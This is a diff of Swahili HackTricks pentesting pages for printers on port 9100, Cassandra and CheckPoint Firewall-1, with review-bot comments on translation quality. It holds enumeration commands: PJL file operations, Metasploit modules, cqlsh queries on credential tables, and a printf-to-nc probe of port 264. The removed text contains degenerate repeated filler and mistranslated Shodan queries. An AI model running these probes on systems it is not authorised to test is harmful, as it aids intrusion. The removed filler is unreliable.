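Review bot: two headings regress in the new text. L8694 "## Mikono" (literally "hands") replaces L8684 "## Kwa Mkono" ("by hand"), which was the right rendering of "Manual"; and L8683 "# Uhesabu" ("counting") for "Enumeration" is no clearer than the old L8682 "# Uchambuzi". L8674 also drops the quotation marks that L8673 kept around the '_rahisi zaidi..._' phrase quoted from hacking-printers.net, so the quote is no longer marked as one. Removing the paragraphs L8686-L8693 (a generic PJL description that does not come from the linked source) is the right call.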
@ -57,14 +44,6 @@ nc -vn <IP> 9100
@PJL FSDELETE #Useful to delete a file
```
## Kiotomatiki
Pamoja na teknolojia ya kiotomatiki, unaweza kufanya shughuli za kiotomatiki bila kuingilia kati kwa mikono. Hii inaweza kuwa na manufaa katika muktadha wa udukuzi wa mtandao, kwani inaweza kukusaidia kufanya shughuli nyingi kwa haraka na kwa ufanisi.
Kuna njia kadhaa za kufanya kiotomatiki katika udukuzi wa mtandao. Moja ya njia hizo ni kutumia skrini ya kiotomatiki, ambayo inaruhusu kurekodi na kucheza tena hatua zilizochukuliwa kwenye kifaa. Hii inaweza kuwa na manufaa katika kudukua huduma za mtandao ambazo zinahitaji hatua nyingi za kuingia au kufanya shughuli fulani.
Njia nyingine ya kiotomatiki ni kutumia lugha ya programu kama Python au Bash kufanya shughuli za kiotomatiki. Unaweza kuandika skripti ambazo zinafanya hatua zinazohitajika kwa udukuzi wa mtandao, kama vile kuingia kiotomatiki kwenye huduma au kufanya uchunguzi wa usalama.
Kwa kumalizia, teknolojia ya kiotomatiki inaweza kuwa rasilimali muhimu katika udukuzi wa mtandao. Inakuruhusu kufanya shughuli nyingi kwa haraka na kwa ufanisi, na inaweza kuokoa muda na juhudi zako. Hata hivyo, ni muhimu kutumia teknolojia hii kwa uwajibikaji na kuzingatia sheria na maadili ya udukuzi wa mtandao.
```bash
nmap -sV --script pjl-ready-message -p <PORT> <IP>
```
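Review bot: the paragraphs L8702-L8705 under "## Kiotomatiki" are generic filler about automation (closing with an ethics aside) that has nothing to do with port 9100 and is not taken from the source page; the hunk header (-14 +6) shows they are being removed, which is correct. The heading plus the `nmap -sV --script pjl-ready-message` line on L8707 is all this section needs.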
@ -79,9 +58,9 @@ msf> use auxiliary/scanner/printer/printer_download_file
msf> use auxiliary/scanner/printer/printer_upload_file
msf> use auxiliary/scanner/printer/printer_delete_file
```
## Kifaa cha Kudukua Printers
## Printers Hacking tool
Hii ni zana unayotaka kutumia kudhulumu printers:
Hii ni zana unayotaka kutumia kuharibu printers:
{% embed url="https://github.com/RUB-NDS/PRET" %}
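Review bot: L8716 "kuharibu printers" means "to damage/destroy printers", which changes the meaning of the original "abuse"; L8715's "kudhulumu" was closer, and "kutumia vibaya" would be clearer still. L8714 also replaces the Swahili heading on L8713 with the English "## Printers Hacking tool" (odd capitalisation as well), the same untranslated-heading problem seen in the other files of this commit.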
@ -90,16 +69,17 @@ Hii ni zana unayotaka kutumia kudhulumu printers:
* `pjl port:9100`
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
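Review bot: L8721-L8722 read "Jifunze & fanya mazoezi ya ..." where the same two footer lines in the other files (L8515-L8516, L8634-L8635, L8976-L8977) read "Jifunze na fanya mazoezi ya ..."; L8731 likewise ends with "github repos" where L8734 and the other files use "repos za github". The boilerplate should be byte-identical across files so it can be diffed and updated in one place.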

View file

@ -1,302 +1,35 @@
# 9042/9160 - Kupima Usalama wa Cassandra
# 9042/9160 - Pentesting Cassandra
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
**Apache Cassandra** ni **mfumo wa hifadhidata uliogawanyika** unaoweza kusambazwa sana, wenye **utendaji wa juu**, ulioundwa kushughulikia **kiasi kikubwa cha data** kwenye **seva nyingi za kawaida**, huku ukihakikisha **upatikanaji wa juu** bila **kitovu cha kushindwa**. Ni aina ya **hifadhidata ya NoSQL**.
**Apache Cassandra** ni **database** ya **kugawanywa** yenye **uwezo mkubwa wa kupanuka** na **utendaji wa juu** iliyoundwa kushughulikia **kiasi kikubwa cha data** kwenye **seva za kawaida**, ikitoa **upatikanaji wa juu** bila **nukta moja ya kushindwa**. Ni aina ya **NoSQL database**.
Katika hali kadhaa, unaweza kugundua kuwa Cassandra inakubali **vyeti vyovyote** (kwa kuwa hakuna vyeti vilivyowekwa) na hii inaweza kumruhusu mshambuliaji kufanya **uchambuzi** wa hifadhidata.
Katika hali kadhaa, unaweza kupata kwamba Cassandra inakubali **akili yoyote** (kwa sababu hakuna zilizowekwa) na hii inaweza kuruhusu mshambuliaji **kuhesabu** database.
**Bandari ya chaguo:** 9042,9160
**Bandari ya kawaida:** 9042,9160
```
PORT STATE SERVICE REASON
9042/tcp open cassandra-native Apache Cassandra 3.10 or later (native protocol versions 3/v3, 4/v4, 5/v5-beta)
9160/tcp open cassandra syn-ack
```
## Uchunguzi
## Enumeration
### Kwa Mkono
#### Kupata Nodes za Cassandra
Kutumia nodetool, unaweza kupata orodha ya nodes za Cassandra zinazofanya kazi kwenye mfumo:
```bash
nodetool status
```
#### Kupata Keyspaces
Kutumia cqlsh, unaweza kupata orodha ya keyspaces zilizopo kwenye mfumo:
```bash
DESCRIBE keyspaces;
```
#### Kupata Tables
Kutumia cqlsh, unaweza kupata orodha ya tables zilizopo kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Columns
Kutumia cqlsh, unaweza kupata orodha ya columns zilizopo kwenye table fulani:
```bash
USE keyspace_name;
SELECT * FROM table_name LIMIT 1;
```
#### Kupata Data
Kutumia cqlsh, unaweza kupata data iliyopo kwenye table fulani:
```bash
USE keyspace_name;
SELECT * FROM table_name;
```
#### Kupata Uthibitishaji wa Nje
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa nje uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Ndani
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa ndani uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Jumla
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa jumla uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikoa
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikoa uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Mtumiaji
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa mtumiaji uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha kikundi uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha kikundi uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
### Manual
```bash
pip install cqlsh
cqlsh <IP>
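Review bot: the old text L8776-L8953 is a degenerate run of near-identical subsections ("Kupata Uthibitishaji wa Kikundi cha Kikundi cha ...") each wrapping the same `USE keyspace_name; DESCRIBE tables;` block; it is machine-generated filler, and the hunk header (-302 +35) confirms it is being dropped, which is right. Two issues remain in the new lines: L8765 renders "credentials" as "akili yoyote" ("any intelligence/mind"), a mistranslation that neither the old "vyeti vyovyote" ("any certificates") nor the new wording gets right ("kitambulisho chochote", or keep "credentials"), and L8761 keeps the English heading "## Basic Information" above a Swahili body.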
@ -311,9 +44,9 @@ SELECT * from logdb.user_auth; #Can contain credential hashes
SELECT * from logdb.user;
SELECT * from configuration."config";
```
### Kiotomatiki
### Automated
Hapa hakuna chaguo nyingi na nmap hupata habari kidogo sana.
Hapa hakuna chaguzi nyingi na nmap haipati taarifa nyingi
```bash
nmap -sV --script cassandra-info -p <PORT> <IP>
```
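Review bot: L8965 drops the sentence-final full stop that L8964 had, and L8963 replaces the Swahili heading on L8962 with the English "### Automated" while the paragraph under it stays Swahili; keep headings and body in the same language within a file.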
@ -321,19 +54,20 @@ nmap -sV --script cassandra-info -p <PORT> <IP>
### **Shodan**
`port:9160 Kikundi`\
`port:9042 "Toleo la itifaki lisiloungwa mkono au lisiloungwa mkono"`
`port:9160 Cluster`\
`port:9042 "Invalid or unsupported protocol version"`
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
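Review bot: the restored query strings `port:9160 Cluster` and `port:9042 "Invalid or unsupported protocol version"` are the right fix here; the removed lines `port:9160 Kikundi` and `port:9042 "Toleo la itifaki lisiloungwa mkono ..."` had translated the literal banner text that Shodan matches verbatim, so those queries would never return a result. Worth adding a rule to the translation job that search queries, banners and quoted program output are never translated, so this does not regress on the next run. The old footer also linked `@carlospolopm` to the `hacktricks_live` Twitter URL; the new footer is consistent.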

View file

@ -1,28 +1,31 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Inawezekana kuingiliana na firewall za **CheckPoint** **Firewall-1** ili kupata habari muhimu kama jina la firewall na jina la kituo cha usimamizi. Hii inaweza kufanywa kwa kutuma ombi kwenye bandari **264/TCP**.
Inawezekana kuingiliana na **CheckPoint** **Firewall-1** firewalls ili kugundua taarifa muhimu kama vile jina la firewall na jina la kituo cha usimamizi. Hii inaweza kufanywa kwa kutuma ombi kwa bandari **264/TCP**.
### Kupata Majina ya Firewall na Kituo cha Usimamizi
Kwa kutumia ombi la kabla ya uthibitishaji, unaweza kutekeleza moduli inayolenga **CheckPoint Firewall-1**. Amri muhimu kwa operesheni hii zimefafanuliwa hapa chini:
Kwa kutumia ombi la kabla ya uthibitisho, unaweza kutekeleza moduli inayolenga **CheckPoint Firewall-1**. Amri zinazohitajika kwa operesheni hii zimeelezwa hapa chini:
```bash
use auxiliary/gather/checkpoint_hostname
set RHOST 10.10.10.10
```
Baada ya kutekelezwa, moduli inajaribu kuwasiliana na huduma ya Topolojia ya SecuRemote ya firewall. Ikiwa mafanikio, inathibitisha uwepo wa Firewall ya CheckPoint na kupata majina ya firewall na mwenyeji wa usimamizi wa SmartCenter. Hapa kuna mfano wa jinsi matokeo yanavyoweza kuonekana:
Upon execution, the module attempts to contact the firewall's SecuRemote Topology service. If successful, it confirms the presence of a CheckPoint Firewall and retrieves the names of both the firewall and the SmartCenter management host. Here's an example of what the output might look like:
Kwa utekelezaji, moduli inajaribu kuwasiliana na huduma ya SecuRemote Topology ya firewall. Ikiwa inafanikiwa, inathibitisha uwepo wa CheckPoint Firewall na inapata majina ya firewall na mwenyeji wa usimamizi wa SmartCenter. Hapa kuna mfano wa jinsi matokeo yanaweza kuonekana:
```text
[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
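Review bot: the paragraph starting `Upon execution, the module attempts to contact the firewall's SecuRemote Topology service` sits in English immediately before its Swahili rendering `Kwa utekelezaji, moduli inajaribu kuwasiliana ...`, so the translated page now carries the same paragraph twice. Drop the untranslated English copy (or, if the English is intended as a reference, mark it as such) so readers are not shown the text in both languages. The `use auxiliary/gather/checkpoint_hostname` / `set RHOST 10.10.10.10` block is unchanged and fine.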
@ -30,33 +33,34 @@ Baada ya kutekelezwa, moduli inajaribu kuwasiliana na huduma ya Topolojia ya Sec
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed
```
### Njia Mbadala ya Kugundua Jina la Hostname na ICA
### Njia Mbadala ya Kugundua Jina la Kikoa na Jina la ICA
Tekniki nyingine inahusisha amri moja moja ambayo inatuma ombi maalum kwa firewall na kuchambua majibu ili kuchukua jina la hostname na ICA la firewall. Amri na muundo wake ni kama ifuatavyo:
Mbinu nyingine inahusisha amri ya moja kwa moja inayotuma swali maalum kwa firewall na kuchambua jibu ili kupata jina la kikoa la firewall na jina la ICA. Amri na muundo wake ni kama ifuatavyo:
```bash
printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-
```
Matokeo kutoka amri hii hutoa taarifa za kina kuhusu jina la cheti (CN) na shirika (O) la firewall, kama inavyoonyeshwa hapa chini:
Matokeo kutoka kwa amri hii yanatoa taarifa za kina kuhusu jina la cheti la firewall (CN) na shirika (O), kama inavyoonyeshwa hapa chini:
```text
CN=Panama,O=MGMTT.srv.rxfrmi
```
## Marejeo
## References
* [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit\_doGoviewsolutiondetails=&solutionid=sk69360](https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360)
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html\#check-point-firewall-1-topology-port-264](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264)
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki hila za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
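Review bot: the new heading `### Njia Mbadala ya Kugundua Jina la Kikoa na Jina la ICA` and the sentence `... kupata jina la kikoa la firewall na jina la ICA` translate "hostname" as "jina la kikoa", which means domain name; the previous `Jina la Hostname` was closer, so either keep "hostname" untranslated or use a word meaning host name rather than domain. `## Marejeo` becoming `## References` is another English heading on a Swahili page; pick one convention. On the command `printf ... | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-`, `-q` is an option of the OpenBSD/traditional netcat packages and is not accepted by Nmap's `ncat`, so a short note that the line assumes GNU/OpenBSD `nc` would save readers a confusing error.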

View file

@ -1,25 +1,26 @@
{% hint style="success" %}
